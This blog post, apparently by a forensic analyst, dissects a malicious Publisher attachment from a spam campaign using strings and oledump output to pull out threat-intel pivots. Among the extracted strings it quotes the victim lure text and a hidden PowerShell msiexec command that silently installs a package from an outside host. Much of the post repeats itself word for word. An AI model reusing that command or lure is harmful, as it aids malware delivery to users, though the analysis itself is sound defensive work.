PUB File
Earlier this month, I saw a tweet that led me to this Trend Micro write-up regarding a spam campaign where the bad guys sent malicious MS Publisher .pub file attachments that downloaded an MSI file (using .pub files as lures has been seen before). The write-up included a hash for the .pub file, which I was able to use to locate a copy of the file, so I could take a look at it myself. MS Publisher files follow the OLE file format, so I wanted to take a shot at "peeling the onion" on this file, as it were.
Why would I bother doing this? For one, I believe that there is a good bit of value that does unrealized when we don't look at artifacts like this, value that may not be immediately realized by a #DFIR analyst, but may be much more useful to an intel analyst.
I should note that the .pub file is detected by Windows Defender as Trojan:O97M/Bynoco.PA.
The first thing I did was run 'strings' against the file. Below are some of the more interesting strings I was able to find in the file:
E:\tmp\wix_tmp\officehomems.com_sched\1en.pub
proverka@example.com
BaseClass=crysler
comodostar
alabama
Document created using the application not related to Microsoft Office
For viewing/editing, perform the following steps:
Click Enable editing button from the yellow bar above.
Once you have enabled editing, please click Enable Content button from the yellow bar above.
"-executionpolicy bypass -noprofile -w hidden -c & ""msiexec"" url1=gmail url2=com /q /i http://homeofficepage[.]com/TabSvc"
Shceduled update task
Back to the strings themselves; I'm sure that you can see why I saw these as interesting strings. For example, note the misspelling of "Shceduled". This may be something on which we can pivot in our analysis, locating instances of a scheduled task with that same misspelling within our infrastructure. Interestingly enough, when I ran a Google search for "shceduled task", most of the responses I got were legitimate posts where the author had misspelled the word. ;-)
The message to the user seen in the strings above looks similar to figure 2 found in this write-up regarding Sofacy, but searching a bit further, we find the exact message string being used in lures that end up deploying ransomware.
Next, I ran 'oledmp.pl' against the file; below is the output, trimmed for readability:
Root Entry Date: 20.11.2018, 14:40:11 CLSID: 00021201-0000-0000-00C0-000000000046
1 D.. 0 20.11.2018, 14:40:11 \Objects
2 D.. 0 20.11.2018, 14:40:11 \Quill
3 D.. 0 20.11.2018, 14:40:11 \Escher
4 D.. 0 20.11.2018, 14:40:11 \VBA
7 F.. 10602 \Contents
8 F.T 94 \CompObj
9 F.T 16384 \SummaryInformation
10 F.T 152 \DocumentSummaryInformation
11 D.. 0 20.11.2018, 14:40:11 \VBA\VBA
12 D.. 0 20.11.2018, 14:40:11 \VBA\crysler
18 F.. 387 \VBA\crysler\f
19 F.. 340 \VBA\crysler\o
20 F.T 97 \VBA\crysler\CompObj
21 F.. 439 \VBA\crysler\ VBFrame
22 F.. 777 \VBA\VBA\dir
23 FM. 1431 \VBA\VBA\crysler
30 FM. 8799 \VBA\VBA\ThisDocument
As you can see, there are a number of streams that include macros. Also, from the output listed above, we can see that the file was likely created on 20 Nov 2018, which is something that can likely be used by intel analysts.
Using oledump.py to extract the macros, we can see that they aren't obfuscated in any way. In fact, the two visible macros are well-structured, and don't appear do much at all; the malicious functionality appears to embedded someplace else within the file itself.
Windows Artifacts and Threat Intel
I ran across a pretty fascinating tweet thread from Steve the other day. In this thread, Steve talked about how he's used PDB paths to not just get some interesting information from malware, but to build out a profile of the malware author over a decade, and how he was able to pivot off of that information. In the tweet thread, Steve provides some very interesting foundational information, as well as an example of how this information has been useful. Unfortunately, it's in a tweet thread and not some more permanent format.
I still believe that something very similar can be done with LNK files sent by an adversary, as well as other "weaponized" documents. This includes OLE-format Word and Publisher documents, as well. Using similar techniques to what Steve employed, including Yara rules to conduct a VT retro-hunt, information can be built out using not just information collected from the individual files themselves, but information provided by VT, such as submission date, etc.
Why would I bother doing this? For one, I believe that there is a good bit of value that does unrealized when we don't look at artifacts like this, value that may not be immediately realized by a #DFIR analyst, but may be much more useful to an intel analyst.
I should note that the .pub file is detected by Windows Defender as Trojan:O97M/Bynoco.PA.
The first thing I did was run 'strings' against the file. Below are some of the more interesting strings I was able to find in the file:
E:\tmp\wix_tmp\officehomems.com_sched\1en.pub
proverka@example.com
BaseClass=crysler
comodostar
alabama
Document created using the application not related to Microsoft Office
For viewing/editing, perform the following steps:
Click Enable editing button from the yellow bar above.
Once you have enabled editing, please click Enable Content button from the yellow bar above.
"-executionpolicy bypass -noprofile -w hidden -c & ""msiexec"" url1=gmail url2=com /q /i http://homeofficepage[.]com/TabSvc"
Shceduled update task
One aspect of string searches in OLE format files that analysts need to keep in mind is that the file structure truly is one of a "file system within a file", as the structure includes sector tables that identify the sectors that comprise the various streams within the file. What this means is that the streams themselves are not contiguous, and that strings contained in the file may possibly be separated across the sectors. For example, it is possible that for the string "alabama" listed above, part of the string (i.e., "ala") may exist in one sector, and the remaining portion of the string may exist in another sector, so that searching for the full string may not find all instances of it. Further, with the use of macros, the macros themselves are compressed, throwing another monkey wrench into string searches.
Back to the strings themselves; I'm sure that you can see why I saw these as interesting strings. For example, note the misspelling of "Shceduled". This may be something on which we can pivot in our analysis, locating instances of a scheduled task with that same misspelling within our infrastructure. Interestingly enough, when I ran a Google search for "shceduled task", most of the responses I got were legitimate posts where the author had misspelled the word. ;-)
The message to the user seen in the strings above looks similar to figure 2 found in this write-up regarding Sofacy, but searching a bit further, we find the exact message string being used in lures that end up deploying ransomware.
Next, I ran 'oledmp.pl' against the file; below is the output, trimmed for readability:
Root Entry Date: 20.11.2018, 14:40:11 CLSID: 00021201-0000-0000-00C0-000000000046
1 D.. 0 20.11.2018, 14:40:11 \Objects
2 D.. 0 20.11.2018, 14:40:11 \Quill
3 D.. 0 20.11.2018, 14:40:11 \Escher
4 D.. 0 20.11.2018, 14:40:11 \VBA
7 F.. 10602 \Contents
8 F.T 94 \CompObj
9 F.T 16384 \SummaryInformation
10 F.T 152 \DocumentSummaryInformation
11 D.. 0 20.11.2018, 14:40:11 \VBA\VBA
12 D.. 0 20.11.2018, 14:40:11 \VBA\crysler
18 F.. 387 \VBA\crysler\f
19 F.. 340 \VBA\crysler\o
20 F.T 97 \VBA\crysler\CompObj
21 F.. 439 \VBA\crysler\ VBFrame
22 F.. 777 \VBA\VBA\dir
23 FM. 1431 \VBA\VBA\crysler
30 FM. 8799 \VBA\VBA\ThisDocument
As you can see, there are a number of streams that include macros. Also, from the output listed above, we can see that the file was likely created on 20 Nov 2018, which is something that can likely be used by intel analysts.
Using oledump.py to extract the macros, we can see that they aren't obfuscated in any way. In fact, the two visible macros are well-structured, and don't appear do much at all; the malicious functionality appears to embedded someplace else within the file itself.
Windows Artifacts and Threat Intel
I ran across a pretty fascinating tweet thread from Steve the other day. In this thread, Steve talked about how he's used PDB paths to not just get some interesting information from malware, but to build out a profile of the malware author over a decade, and how he was able to pivot off of that information. In the tweet thread, Steve provides some very interesting foundational information, as well as an example of how this information has been useful. Unfortunately, it's in a tweet thread and not some more permanent format.
I still believe that something very similar can be done with LNK files sent by an adversary, as well as other "weaponized" documents. This includes OLE-format Word and Publisher documents, as well. Using similar techniques to what Steve employed, including Yara rules to conduct a VT retro-hunt, information can be built out using not just information collected from the individual files themselves, but information provided by VT, such as submission date, etc.